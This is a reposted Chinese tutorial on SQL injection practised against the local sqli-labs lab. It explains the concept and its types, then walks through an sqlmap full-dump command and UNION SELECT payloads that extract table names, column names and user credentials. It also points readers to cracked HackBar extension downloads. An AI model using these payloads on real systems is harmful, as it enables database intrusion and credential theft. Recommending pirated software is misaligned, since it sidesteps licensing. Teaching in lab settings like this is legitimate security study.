python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -a --thread 10 --batch
显示:
sqlmap--all
显然这个过程很长,也很浪费资源,并且容易被对方发现,不要轻易使用。
可以在在线练习靶场进行练习:
https://www.mozhe.cn/bug/d1hJazFDeGRHV05DVjI3YXpHREZGUT09bW96aGUmozhe
三、SQL注入原理
1.介绍SQL注入
SQL注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库任意操作。
SQL注入漏洞的产生需要满足两个条件:
- 参数用户可控
- 参数带入数据库查询,传入的参数拼接到SQL语句,并且带入数据库查询,即与数据库要有交互
2.SQL注入的危害
- 数据库敏感信息泄露
- 页面被窜改
- 数据库被恶意操作
- 服务器被远程控制
所以在进行开发时,前后端都要进行验证,来保证安全性。
3.SQL注入的分类
根据注入位置数据类型分类
- 字符串型
- 数字型
(1)字符串注入测试:
使用security数据库测试:
正常情况下:
select * from users where username = '' and password = '';
打印
Empty set (0.01 sec)
即查询条件为空时未查到数据。
进行字符串注入后:
select * from users where username = '' or 1 = 1; -- ' and password = '';
打印
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)
此时查询到users表中的所有数据。
原理是:
不闭合前面单引号,后边加or(or后边加恒成立的布尔表达式),导致我热热恒为真,后边加–注释掉后边的语句,所以这个SQL语句相当于:
select * from users where true;
(2)数字注入测试:
正常情况下:
select * from users where id = 1;
打印
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.01 sec)
进行数字注入后:
select * from users where id =-1 or 1 = 1;
打印
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)
即前面的id变为负失效,后面加入or语句,使之恒成立。
根据返回结果分类
- 显错注入(error-based)
- 盲注(boolean/time-based blind)
4.SQL注入的形成原因
- 数据与代码未严格分离
- 用户提交的参数数据未做充分检查过滤及被带入到SQL命令中,改变了原有SQL命令的语义 ,且成功被数据库执行
5.SQL注入过程
四、浏览器hackbar插件安装
1.Google Chrome安装hackbar
由于新版hackbar改为付费的,直接安装需要付费不太方便,所以使用破解版,而且一般安装需要Google插件需要科学上网,对于小白来说不太方便,因此可通过文件安装破解后的扩展程序的方式进行安装,比较方便。
这了提供英文原版https://download.csdn.net/download/CUFEECR/12209736和汉化版https://download.csdn.net/download/CUFEECR/12209697的HackBar插件,可点击下载,解压后安装。
安装步骤示意如下:
2.Firefox安装HackBar
火狐中新版本的HackBar也是收费的,有2种方法解决:
使用旧版本的HackBar
可点击https://download.csdn.net/download/CUFEECR/12209830下载。
解压后安装步骤如下:
- 打开firefox的附加组件,点击从文件安装附加组件;
- 打开 {4c98c9c7-fc13-4622-b08a-a18923469c1c}.xpi文件添加扩展;
- 关闭HackBar自动更新:
找到HackBar插件,点右上角菜单,最后点击选项就会出来允许自动更新的设置,将自动更新设置为关。
注意:
一定记住要关闭插件的自动更新,否则浏览器会自动更新插件到收费版本!!!
安装完成之后,可以看到HackBar的效果:
使用功能类似的插件代替HackBar
在火狐扩展组件商店https://addons.mozilla.org/zh-CN/firefox/search/?platform=windows&q=HackBar搜索hackbar会出来很多类似的插件,功能基本都是一样的。
可以选择其他组件替代,如Max HackBar等。
五、SQL注入
1.GET和POST请求
- GET提交:
请求的数据会附在URL之后(就是把数据放置在HTTP协议头中),一般以?分割URL和传输数据,多个参数用&连接。 - POST提交:
把提交的数据放置在HTTP包的包体中。
GET提交的数据会在地址栏中显示出来,而POST提交,地址栏不会改变,因此POST请求比GET请求更安全。
2.get基于报错的SQL注入
发现注入点
通过url中修改对应的ID值,为正常数字、字符(单引号、双引号、括号)、反斜线来探测url中是否存在注入点。
访问http://127.0.0.1/sqli-labs/Less-1/?id=1’,显示如下:
有报错信息:
‘‘1’’ LIMIT 0,1’
可以分析出SQL查询语句为:
select * from xxx where id = '1'' limit 0,1;
访问http://127.0.0.1/sqli-labs/Less-2/?id=1’,显示如下:
有报错信息:
‘’ LIMIT 0,1’
可以分析出SQL查询语句为:
select * from xxx where id = "1" limit 0,1;
访问http://127.0.0.1/sqli-labs/Less-3/?id=1’,显示如下:
有报错信息:
‘‘1’’) LIMIT 0,1’
可以分析出SQL查询语句为:
select * from xxx where id = ('1') limit 0,1;
访问http://127.0.0.1/sqli-labs/Less-4/?id=1",显示如下:
有报错信息:
‘“1"”) LIMIT 0,1’
可以分析出SQL查询语句为:
select * from xxx where id = ("1") limit 0,1;
get基于报错的SQL注入利用
(1)order by判断字段数
访问http://127.0.0.1/sqli-labs/Less-1/?id=1’ order by 1 --+,显示
可以正常访问,2和3时也一样可以访问。
访问http://127.0.0.1/sqli-labs/Less-1/?id=1’ order by 4 --+,显示
此时不能正常访问,从而可以判断出字段数为3。
说明:
–+相当于数据库中的注释,注释掉后面的语句。
(2)利用union select联合查询,获取表名
访问http://127.0.0.1/sqli-labs/Less-1/?id=0’ union select 1,2,3 --+,显示:
因探测出的字段数为3,所以union select后的字段数也必须为3,否则会出现异常。
访问http://127.0.0.1/sqli-labs/Less-1/?id=0’ union select 1,user(),database() --+,显示:
显然暴露出数据库security。
访问http://127.0.0.1/sqli-labs/Less-1/?id=0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+,显示:
显然,此时得到数据库内的表名。
(3)利用union select联合查询,获取字段名
访问http://127.0.0.1/sqli-labs/Less-1/?id=0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ --+,显示:
即得到了指定表中所有的字段,可能比目标表中的字段要多,这是因为可能别的数据库中也有users表,这些users表中的字段也包含在内。
(4)利用union select联合查询,获取字段值
访问http://127.0.0.1/sqli-labs/Less-1/?id=0’ union select 1,group_concat(username,password),3 from users --+,显示:
得到了指定表中所有数据。
转载:https://blog.csdn.net/CUFEECR/article/details/104637404
查看评论